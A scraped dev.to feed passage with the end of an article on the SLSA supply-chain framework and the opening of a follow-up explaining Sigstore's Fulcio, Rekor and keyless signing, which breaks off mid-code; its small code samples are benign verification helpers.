&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl40e0c3epwel83ljd545.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl40e0c3epwel83ljd545.png" alt="vsa" width="800" height="476"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;npm implemented exactly this model. When you upload a package, npm verifies the Provenance server-side and displays the result on npmjs.com. Consumers treat npm as the trusted verifier, entirely bypassing the need to verify individual Provenance files themselves.&lt;/p&gt;
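&lt;p&gt;In code, the consumer-side decision shrinks to a few checks. The sketch below assumes the VSA's own signature has already been verified and the statement parsed into a dict; the field names (&lt;code&gt;verifier.id&lt;/code&gt;, &lt;code&gt;verificationResult&lt;/code&gt;, &lt;code&gt;verifiedLevels&lt;/code&gt;) follow the SLSA VSA predicate, while &lt;code&gt;trusted_verifiers&lt;/code&gt; is a hypothetical policy input.&lt;/p&gt;

```python
def accept_vsa(vsa, trusted_verifiers, required_level):
    # Instead of re-walking every dependency's Provenance chain, trust
    # the verifier that already did the work -- if it's one we trust.
    pred = vsa["predicate"]
    if pred["verifier"]["id"] not in trusted_verifiers:
        return False
    if pred["verificationResult"] != "PASSED":
        return False
    # e.g. required_level = "SLSA_BUILD_LEVEL_3"
    return required_level in pred.get("verifiedLevels", [])
```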




&lt;h2&gt;
  
  
  Real-World Implementations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  GitHub Actions: Achieving Build L3
&lt;/h3&gt;

&lt;p&gt;The mechanism that generates SLSA Build L3 Provenance on GitHub Actions is &lt;code&gt;slsa-framework/slsa-github-generator&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhfczx2o7d4kfbh9isbxe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhfczx2o7d4kfbh9isbxe.png" alt="Real World Implementation" width="800" height="602"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is how the L3 isolation requirement is met. Provenance generation is implemented as a &lt;strong&gt;Reusable Workflow&lt;/strong&gt; running in a completely separate execution environment from the user's workflow. The user's code has zero access to the Provenance generation or signing process.&lt;/p&gt;

&lt;p&gt;It leverages Sigstore's keyless signing. GitHub Actions workflows generate OIDC (OpenID Connect) tokens at runtime containing proof of "which repo, which workflow, and which trigger ran this." &lt;code&gt;slsa-github-generator&lt;/code&gt; presents this token to Fulcio (Sigstore's CA) to grab a short-lived signing certificate. The signature is immortalized in Rekor (transparency log). This achieves publicly verifiable signatures with zero long-term key management.&lt;/p&gt;

&lt;h3&gt;
  
  
  npm: The Deepest Ecosystem Integration
&lt;/h3&gt;

&lt;p&gt;npm rolled out Provenance support in 2023, boasting the deepest SLSA integration of any package ecosystem to date.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simply appending the &lt;code&gt;--provenance&lt;/code&gt; flag to &lt;code&gt;npm publish&lt;/code&gt; publishes the package with Provenance when run from GitHub Actions or GitLab CI/CD.&lt;/li&gt;
&lt;li&gt;Build Provenance details are front and center on every package page on npmjs.com.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;npm audit signatures&lt;/code&gt; can batch-verify the Provenance of your entire dependency tree.&lt;/li&gt;
&lt;li&gt;Provenance is signed via Sigstore and recorded in public transparency logs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  PyPI: PEP 740 Digital Attestations
&lt;/h3&gt;

&lt;p&gt;PyPI officially introduced Digital Attestation support in November 2024 via PEP 740. It operates in tandem with Trusted Publishing (OIDC-based auth from GitHub Actions, etc.). PyPA's publishing action v1.11.0 enables it by default, bringing around 20,000 packages into Attestation-ready status.&lt;/p&gt;

&lt;p&gt;However, as of November 2024, only about 5% of the top 360 most downloaded packages actually carried Attestations. Roughly two-thirds of the top packages simply haven't cut a release since the feature dropped, but even so, the ecosystem integration is undeniably shallower than npm's right now. You can track adoption at &lt;a href="https://trailofbits.github.io/are-we-pep740-yet/" rel="noopener noreferrer"&gt;Are we PEP 740 yet?&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  What SLSA Does Not Cover
&lt;/h2&gt;

&lt;p&gt;It's incredibly tempting to say, "It's SLSA Build L3 compliant, so it's perfectly safe." But it's not. Misunderstanding SLSA's boundaries breeds fatal overconfidence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It does not evaluate code quality.&lt;/strong&gt; SLSA doesn't care if your source code is riddled with zero-days. It guarantees "the code wasn't tampered with," not "the code is inherently safe."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;There is no transitive trust.&lt;/strong&gt; Just because an artifact hits SLSA Build L3 does not mean its dependencies are L3. SLSA levels apply strictly to a single artifact. Dependencies must be verified recursively.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It does not prevent typosquatting.&lt;/strong&gt; Installing &lt;code&gt;1odash&lt;/code&gt; instead of &lt;code&gt;lodash&lt;/code&gt; is entirely outside SLSA's jurisdiction. However, because Provenance hardcodes the source repo URL, it can be weaponized to verify, "Did this package actually come from the repo I think it did?"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It does not protect against malicious producers.&lt;/strong&gt; If the author intentionally writes malware into the codebase, SLSA won't stop it. Open-source visibility increases detection, but that's not a feature of SLSA itself.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;SLSA is a framework to mathematically verify "what source this software came from, and what exact process built it."&lt;/p&gt;

&lt;p&gt;The Build Track progressively raises the bar for forging Provenance: L1 guarantees it exists, L2 adds platform signatures, and L3 isolates the build environments. The Source Track aggressively locks down code change management, peaking at L4 with mandatory two-person reviews.&lt;/p&gt;

&lt;p&gt;Six years after SolarWinds, the ecosystem is rapidly catching up. GitHub Actions' &lt;code&gt;slsa-github-generator&lt;/code&gt;, npm's native Provenance, and PyPI's PEP 740 are hardening the supply chain infrastructure. The spec itself is actively evolving, with v1.1 and v1.2 dropping in 2025 to officially enshrine the Source Track.&lt;/p&gt;

&lt;p&gt;Will SLSA prevent every attack? No. But the difference between "we have absolutely no idea where this binary came from" and "we have mathematically verifiable evidence" is night and day—both for incident response times and the sheer wall attackers have to climb to compromise your software.&lt;/p&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/spec/v1.2/" rel="noopener noreferrer"&gt;SLSA Specification v1.2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/blog/2025/04/slsa-v1.1" rel="noopener noreferrer"&gt;SLSA v1.1 Approved (2025-04)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/blog/2025/11/announce-slsa-v1.2" rel="noopener noreferrer"&gt;SLSA v1.2 Announcement (2025-11)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa" rel="noopener noreferrer"&gt;SLSA GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-github-generator" rel="noopener noreferrer"&gt;slsa-github-generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-verifier" rel="noopener noreferrer"&gt;slsa-verifier&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/in-toto/attestation" rel="noopener noreferrer"&gt;in-toto Attestation Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.npmjs.com/generating-provenance-statements/" rel="noopener noreferrer"&gt;npm Provenance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.pypi.org/posts/2024-11-14-pypi-now-supports-digital-attestations/" rel="noopener noreferrer"&gt;PyPI Digital Attestations (PEP 740)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/" rel="noopener noreferrer"&gt;SUNSPOT Technical Analysis (CrowdStrike)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://about.codecov.io/apr-2021-post-mortem/" rel="noopener noreferrer"&gt;Codecov Post-Mortem&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openssf.org/" rel="noopener noreferrer"&gt;OpenSSF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>supplychain</category>
      <category>slsa</category>
      <category>openssf</category>
    </item>
    <item>
      <title>Sigstore Deep Dive: Unmasking the Magic Behind Keyless Verification</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Wed, 22 Apr 2026 14:51:44 +0000</pubDate>
      <link>https://dev.to/kanywst/sigstore-deep-dive-unmasking-the-magic-behind-keyless-verification-lmh</link>
      <guid>https://dev.to/kanywst/sigstore-deep-dive-unmasking-the-magic-behind-keyless-verification-lmh</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;In my previous article, "Supply Chain Security: A Deep Dive into SBOM and Code Signing," we took Cosign's keyless signing for a spin. You run &lt;code&gt;cosign sign&lt;/code&gt;, your browser pops up, you log in with GitHub, and boom—your container image is signed. No private key management. The moment the signing is done, the key is thrown away into the void.&lt;/p&gt;

&lt;p&gt;It was insanely convenient. But honestly? I had absolutely no idea what was happening under the hood.&lt;/p&gt;

&lt;p&gt;"If we threw the key away, how the hell can we verify it later?"&lt;br&gt;
"What's the point of a certificate that expires in 10 minutes?"&lt;br&gt;
"What exactly is a 'transparency log' recording anyway?"&lt;/p&gt;

&lt;p&gt;And fundamentally, why were they so obsessed with erasing the very concept of a "key"?&lt;/p&gt;

&lt;p&gt;Fast forward to 2026, and the software supply chain landscape is a complete bloodbath. Just look at what happened in March and April: attackers stole CI/CD credentials via Trivy GitHub Action tag poisoning, and immediately capitalized on the Claude Code source leak with package squatting. The attack trend has completely shifted from "exploiting code vulnerabilities" to "compromising the build process and CI/CD pipelines to inject malicious payloads." We're no longer asking, "Is this library safe?" We are asking, "Can you cryptographically prove this binary was built from the official repo, through the official CI?" If you can't, nobody is going to trust your artifact.&lt;/p&gt;

&lt;p&gt;Traditional code signing with GPG completely fell apart in the face of this reality. Long-lived private keys bled out of CI/CD server environment variables, ex-employees' keys were left rotting, and nobody—literally nobody—took CRLs (Certificate Revocation Lists) seriously because they were too slow.&lt;/p&gt;

&lt;p&gt;That's why Sigstore isn't just trying to be another tool. It wants to be the &lt;strong&gt;"Let's Encrypt for Code Signing."&lt;/strong&gt; Just as Let's Encrypt eradicated manual certificate management and forced the entire web to HTTPS, Sigstore wants to rip the concept of "key management" out of developers' hands. They are building a world of "Ubiquitous Code Signing," where signing artifacts happens as naturally as breathing.&lt;/p&gt;

&lt;p&gt;To bridge my initial confusion with this massive vision, I decided to completely tear down Sigstore's internals. How Fulcio issues certificates, how Rekor uses Merkle Trees to mathematically detect tampering, and how TUF guards the root of trust. As a follow-up to the previous "getting started" guide, today we are exposing the insane Rube Goldberg machine running behind the scenes just so we can throw our keys away.&lt;/p&gt;


&lt;h2&gt;
  
  
  1. Prerequisites: What You Need to Know
&lt;/h2&gt;

&lt;p&gt;Before we dive into Sigstore, let's nail down three concepts. Skip this if you already know them.&lt;/p&gt;
&lt;h3&gt;
  
  
  1.1 What is OIDC (OpenID Connect)?
&lt;/h3&gt;

&lt;p&gt;OIDC is a protocol where a third party proves "who you are." When you log in to Google or GitHub, that provider issues an &lt;strong&gt;ID Token&lt;/strong&gt;—a signed JSON Web Token (JWT). This JWT contains a cryptographically signed statement from the provider saying, "The owner of this email address successfully authenticated at this exact time."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5pt8dltx4hrgaaqi4b6h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5pt8dltx4hrgaaqi4b6h.png" alt="OIDC" width="673" height="577"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sigstore hijacks this exact mechanism for "signer identity proof." In other words, &lt;strong&gt;it replaces GPG keys with Google/GitHub account verification.&lt;/strong&gt;&lt;/p&gt;
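&lt;p&gt;You can see this for yourself: the payload of a JWT is just base64url-encoded JSON sitting between two dots. The snippet below decodes the claims from a toy, unsigned token built inline (a real verifier must of course also check the signature against the provider's published keys).&lt;/p&gt;

```python
import base64
import json

def jwt_claims(token):
    # A JWT is header.payload.signature; each part is base64url
    # without padding, so we restore the padding before decoding.
    payload = token.split(".")[1]
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

# Build a toy ID Token: {"alg":"RS256"} header, fake signature.
claims = {"iss": "https://accounts.google.com", "email": "you@gmail.com"}
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
token = "eyJhbGciOiJSUzI1NiJ9." + body + ".fake-signature"
```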
&lt;h3&gt;
  
  
  1.2 The Basics of X.509 Certificates and CAs
&lt;/h3&gt;

&lt;p&gt;The X.509 certificates you know from HTTPS are electronic documents where a Certificate Authority (CA) guarantees that "this public key belongs to this entity."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hzo1dvdn9tgf0sd87em.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hzo1dvdn9tgf0sd87em.png" alt="x509" width="435" height="408"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The field inside the certificate that dictates "who this entity is" is called the &lt;strong&gt;SAN (Subject Alternative Name)&lt;/strong&gt;. It holds an email address or a URI. For a Let's Encrypt certificate, a domain name like &lt;code&gt;example.com&lt;/code&gt; sits in the SAN.&lt;/p&gt;

&lt;p&gt;Normal certificates live for a year or more. Because of that, you need massive revocation infrastructures like &lt;strong&gt;CRL (Certificate Revocation List)&lt;/strong&gt; or &lt;strong&gt;OCSP (Online Certificate Status Protocol)&lt;/strong&gt; just in case a private key leaks. But let's be real—they are complex, slow, and browsers frequently ignore them anyway.&lt;/p&gt;
&lt;h3&gt;
  
  
  1.3 What is Certificate Transparency (CT)?
&lt;/h3&gt;

&lt;p&gt;In 2011, a Dutch CA named DigiNotar got hacked, and bogus certificates for &lt;code&gt;*.google.com&lt;/code&gt; were minted. This nightmare birthed &lt;strong&gt;Certificate Transparency (CT)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The idea behind CT is brutally simple: &lt;strong&gt;"Force CAs to log every single certificate they issue into a public, append-only log so anyone can watch them."&lt;/strong&gt; If a certificate isn't in the log, the browser outright rejects it. This way, even if a CA gets compromised and mints fake certs, the community will catch it by monitoring the logs.&lt;/p&gt;

&lt;p&gt;Sigstore dragged this CT concept into the code-signing world. The certificates Fulcio issues are recorded in a CT Log, and every single signing event is recorded in Rekor (the transparency log).&lt;/p&gt;


&lt;h2&gt;
  
  
  2. The Big Picture of Sigstore
&lt;/h2&gt;

&lt;p&gt;With the prerequisites out of the way, let's look at the architecture. Sigstore isn't a single binary; it's a squad of four components working together.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4c6cb4lx4ams0794trv5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4c6cb4lx4ams0794trv5.png" alt="sigstore" width="800" height="262"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;In a Nutshell&lt;/th&gt;
&lt;th&gt;Traditional Equivalent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cosign&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The CLI doing the actual signing and verifying.&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;gpg sign&lt;/code&gt; / &lt;code&gt;gpg verify&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fulcio&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The CA issuing 10-minute certs based on OIDC identity.&lt;/td&gt;
&lt;td&gt;CAs like DigiCert&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rekor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The public, append-only ledger recording all signing events.&lt;/td&gt;
&lt;td&gt;Didn't exist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TUF&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Securely distributes Fulcio's Root CA and Rekor's public keys.&lt;/td&gt;
&lt;td&gt;Manually curling/installing root certs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When we ran &lt;code&gt;cosign sign&lt;/code&gt; in the last article, it was orchestrating all of this behind the scenes. Let's rip open each component.&lt;/p&gt;


&lt;h2&gt;
  
  
  3. Fulcio: The 10-Minute Certificate Authority
&lt;/h2&gt;

&lt;p&gt;Let's start with Fulcio. This is where Sigstore's most radical idea lives.&lt;/p&gt;
&lt;h3&gt;
  
  
  Why Limit Certificates to 10 Minutes?
&lt;/h3&gt;

&lt;p&gt;As mentioned earlier, legacy code signing relied on "long-lived private keys." This is a disaster because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You have to guard the private key with your life (using HSMs or Vault).&lt;/li&gt;
&lt;li&gt;If it leaks, you have to trigger the agonizing CRL/OCSP revocation process.&lt;/li&gt;
&lt;li&gt;Revocation checks are slow and clients often bypass them.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Fulcio annihilates this problem. &lt;strong&gt;"If we make the certificate's lifespan so short that an attacker has no time to exploit it, we don't need revocation management at all."&lt;/strong&gt; Ten minutes is just enough time to verify the OIDC token, issue the cert, perform the signature, and log it to Rekor. After that, the certificate turns into garbage.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lq3ynnyf6k30w3z0o0c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lq3ynnyf6k30w3z0o0c.png" alt="pki vs fulcio" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  The Internal Flow of Issuing a Certificate
&lt;/h3&gt;

&lt;p&gt;When a request hits Fulcio's &lt;code&gt;POST /api/v2/signingCert&lt;/code&gt;, a 7-step process kicks off before you get your cert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx7b72u55uo0u3a9f5j1m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx7b72u55uo0u3a9f5j1m.png" alt="internal flow" width="800" height="863"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's clarify Step 3: &lt;strong&gt;PoP (Proof of Possession)&lt;/strong&gt;. Before hitting Fulcio, Cosign generates an ephemeral key pair and signs the OIDC token's &lt;code&gt;sub&lt;/code&gt; claim with its private key. Fulcio verifies this signature using the provided public key. This proves "the guy asking for this cert actually owns the private key for it," preventing attackers from tying someone else's public key to their own cert.&lt;/p&gt;

&lt;p&gt;Step 6 submits it to a CT Log, as discussed in Section 1.3. If Fulcio's CA key is compromised and rogue certs are minted, clients will reject them because they aren't in the CT Log. &lt;strong&gt;Recording to the CT Log is the fail-safe to monitor Fulcio itself.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Certificate Chain Structure
&lt;/h3&gt;

&lt;p&gt;Fulcio builds a 3-tier certificate chain, identical to HTTPS.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo847ilbd0vzb0fvv5x0w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo847ilbd0vzb0fvv5x0w.png" alt="Certificate Chain" width="425" height="580"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;pathlen: 0&lt;/code&gt; constraint ensures that the intermediate CA cannot spawn any downstream CAs. The Leaf cert is explicitly restricted to signing code.&lt;/p&gt;
&lt;h3&gt;
  
  
  SAN: Engraving the Signer's Identity
&lt;/h3&gt;

&lt;p&gt;Fulcio automatically populates the SAN based on the OIDC Provider.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;OIDC Provider&lt;/th&gt;
&lt;th&gt;SAN Type&lt;/th&gt;
&lt;th&gt;Example Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Google&lt;/td&gt;
&lt;td&gt;Email&lt;/td&gt;
&lt;td&gt;&lt;code&gt;you@gmail.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub (Personal)&lt;/td&gt;
&lt;td&gt;Email&lt;/td&gt;
&lt;td&gt;&lt;code&gt;you@users.noreply.github.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo/.github/workflows/build.yml@refs/heads/main&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitLab CI&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://gitlab.com/org/repo//.gitlab-ci.yml@refs/heads/main&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPIFFE&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;spiffe://example.org/workload&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes SA&lt;/td&gt;
&lt;td&gt;URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://kubernetes.io/namespaces/default/serviceaccounts/my-sa&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The GitHub Actions integration is particularly brilliant. Because the workflow file path and Git ref are burned directly into the SAN, &lt;strong&gt;you get an X.509-level guarantee that "this image was signed by this specific workflow, in this specific repo, from this specific branch."&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  OID Extensions: Hardcoding CI/CD Provenance
&lt;/h3&gt;

&lt;p&gt;Fulcio embeds custom OID extensions (Private Enterprise Number: &lt;code&gt;1.3.6.1.4.1.57264&lt;/code&gt;) into the cert. In CI/CD environments, the entire build provenance is explicitly recorded.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;OID (&lt;code&gt;.1.N&lt;/code&gt;)&lt;/th&gt;
&lt;th&gt;Field Name&lt;/th&gt;
&lt;th&gt;Content&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.8&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC Issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://token.actions.githubusercontent.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.9&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Build Signer URI&lt;/td&gt;
&lt;td&gt;Workflow path + ref&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.11&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Runner Environment&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;github-hosted&lt;/code&gt; or &lt;code&gt;self-hosted&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.12&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source Repository URI&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.13&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source Repository Digest&lt;/td&gt;
&lt;td&gt;Commit SHA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.14&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source Repository Ref&lt;/td&gt;
&lt;td&gt;&lt;code&gt;refs/heads/main&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.20&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Build Trigger&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;push&lt;/code&gt;, &lt;code&gt;pull_request&lt;/code&gt;, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;.1.21&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Run Invocation URI&lt;/td&gt;
&lt;td&gt;URL to the CI run&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;By just inspecting the Fulcio cert, you know &lt;em&gt;exactly&lt;/em&gt; which repo, commit, workflow, trigger, and runner signed the binary. GPG signatures could never even dream of doing this.&lt;/p&gt;


&lt;h2&gt;
  
  
  4. Rekor: The Transparency Log Powered by Merkle Trees
&lt;/h2&gt;

&lt;p&gt;If Fulcio is the CA minting certs, Rekor is the public ledger immutably recording every signing event.&lt;/p&gt;
&lt;h3&gt;
  
  
  The Problem Rekor Solves
&lt;/h3&gt;

&lt;p&gt;Fulcio and CT Logs leave one gaping hole: We need temporal proof that &lt;strong&gt;"this signature actually happened while the 10-minute certificate was still valid."&lt;/strong&gt; The certificate dies in 10 minutes, but if someone forges a signature using that cert 2 hours later, validating the cert chain alone won't tell you if the signature happened within the validity window.&lt;/p&gt;

&lt;p&gt;Rekor solves this. When it receives a signing event, it records the exact time as &lt;code&gt;integratedTime&lt;/code&gt; and signs it with its own private key. This acts as mathematical proof that the signature took place while the cert was alive.&lt;/p&gt;
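&lt;p&gt;Conceptually, the consumer-side check is tiny. A sketch, assuming the certificate's validity window and Rekor's &lt;code&gt;integratedTime&lt;/code&gt; (a Unix timestamp) have already been extracted and both signatures verified:&lt;/p&gt;

```python
from datetime import datetime, timezone

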